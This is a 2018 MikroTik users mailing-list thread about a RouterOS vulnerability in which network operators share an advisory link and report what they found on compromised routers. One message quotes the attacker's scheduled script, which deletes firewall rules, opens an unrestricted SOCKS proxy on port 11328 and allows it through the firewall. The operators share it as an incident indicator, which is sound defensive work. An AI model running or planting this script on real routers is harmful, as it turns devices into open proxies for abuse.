How does one subscribe to your news letter?
*Alex Phillips*
CEO and General Manager
RBNS.net
HighSpeedLink.net
*540-908-3993*



On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users <
mikrotik-users@wispa.org> wrote:

> You should subscribe to our newsletters as we mentioned this several weeks
> ago….  This is the exploit that was fixed back 4 months ago!  Lol
>
>
>
>
>
> *Dennis Burgess, Mikrotik Certified Trainer *
>
> Author of "Learn RouterOS- Second Edition”
>
> *Link Technologies, Inc* -- Mikrotik & WISP Support Services
>
> *Office*: 314-735-0270  Website: http://www.linktechs.net
>
> Create Wireless Coverage’s with www.towercoverage.com
>
>
>
> *From:* mikrotik-users-boun...@wispa.org <mikrotik-users-boun...@wispa.org>
> *On Behalf Of *Bruce Bridegwater via Mikrotik-users
> *Sent:* Sunday, August 5, 2018 8:16 PM
> *To:* 'Shawn C. Peppers' <videodirectwispal...@gmail.com>; 'Mikrotik
> Users' <mikrotik-users@wispa.org>; Bob Pensworth <beeper.bo...@gmail.com>
> *Cc:* JP Douros <jdou...@rpmcable.com>
> *Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>
>
>
> Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it
> to our attention and providing the solution.
>
> RPM manages our Cisco UBR10k CMTS.
>
> Great support company.
> ------------------------------
>
> *From:* mikrotik-users-boun...@wispa.org <mikrotik-users-boun...@wispa.org>
> on behalf of Bob Pensworth via Mikrotik-users <mikrotik-users@wispa.org>
> *Sent:* Sunday, August 5, 2018 7:57:53 PM
> *To:* 'Shawn C. Peppers'; 'Mikrotik Users'
> *Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>
>
>
> We are finding an IP/Socks connection:
>
> We are finding an event entry in System/Scheduler
>
> And the (below) script in System/Script:
>
>
>
> /ip firewall filter remove [/ip firewall filter find where comment ~ "port
> [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255
> connection-idle-timeout=60;/ip socks access remove [/ip socks access
> find];/ip firewall filter add chain=input protocol=tcp port=11328
> action=accept comment="port 11328";/ip firewall filter move [/ip firewall
> filter find comment="port 11328"] 1;
>
>
>
> --
>
> Bob Pensworth, WA7BOB | General Manager
>
> CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-0000, x1
>
>
>
> *From:* mikrotik-users-boun...@wispa.org <mikrotik-users-boun...@wispa.org>
> *On Behalf Of *Shawn C. Peppers via Mikrotik-users
> *Sent:* Friday, March 16, 2018 11:54 AM
> *To:* mikrotik-users@wispa.org; memb...@wisp.org
> *Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>
>
>
> I have not tested this yet but....
>
>
>
>
> https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
>
> :: // Shawn Peppers
>
> :: // DirectlinkAdmin.com
> _______________________________________________
> Mikrotik-users mailing list
> Mikrotik-users@wispa.org
> http://lists.wispa.org/mailman/listinfo/mikrotik-users
>
_______________________________________________
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Reply via email to